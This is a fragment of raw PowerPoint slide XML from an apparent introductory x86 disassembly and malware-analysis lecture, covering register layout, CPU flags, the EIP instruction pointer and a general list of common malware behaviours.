            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842360" y="1856880"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567760" y="1856880"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>0001</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295320" y="1841400"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020720" y="1846440"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>0101</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683640" y="1989000"/>
            <a:ext cx="81252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32 bits</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844520" y="3501000"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569920" y="3501000"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>0001</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297480" y="3485160"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022520" y="3502800"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>0101</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844520" y="4740840"/>
            <a:ext cx="1519560" cy="791640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844520" y="4884840"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569920" y="4884840"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>0001</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="CustomShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297480" y="4869000"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="CustomShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022520" y="4886640"/>
            <a:ext cx="725040" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>0101</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="CustomShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364440" y="4740840"/>
            <a:ext cx="1519560" cy="791640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="CustomShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084000" y="2781000"/>
            <a:ext cx="431640" cy="431640"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="CustomShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364000" y="4293000"/>
            <a:ext cx="359640" cy="359640"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="CustomShape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842520" y="4237920"/>
            <a:ext cx="359640" cy="359640"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="CustomShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653280" y="3623760"/>
            <a:ext cx="81252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16 bits</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="CustomShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678840" y="5025240"/>
            <a:ext cx="69552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8 bits</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="CustomShape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375080" y="1385640"/>
            <a:ext cx="54720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EAX</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="CustomShape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564960" y="2987640"/>
            <a:ext cx="43776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AX</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="CustomShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724000" y="4417920"/>
            <a:ext cx="46152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AH</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="CustomShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7202520" y="4417920"/>
            <a:ext cx="41508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AL</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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="94000"/>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Flags</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ZF: zero flag</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SF: sign flag</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CF: carry flag</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TF: trap flag</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OF: overflow</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Instruction Pointer</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EIP: contains the memory address of the next instruction to be executed -&gt; tells CPU what to do next</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3996000" y="1772640"/>
            <a:ext cx="4896360" cy="1920600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fde9d8"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="ff0000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>When EIP is corrupted, the CPU will not be able to fetch legitimate code  to execute,  therefore the program  running at the time will likely crash. When you control EIP, you can control what is executed by the CPU.</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Malware behaviour</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114"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Malware behaviour are usually to</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Delete crucial files on a computer to render it unusable without a recovery process.</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Log every keyboard input to see what the users type.</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Steal personal or sensitive information or files from a computer.</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Use a computer’s resources for the purpose of the malware, e.g. send spam emails, DDoS another system, or brute-force encryption keys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X86 Disassembly</a:t>
            </a:r>
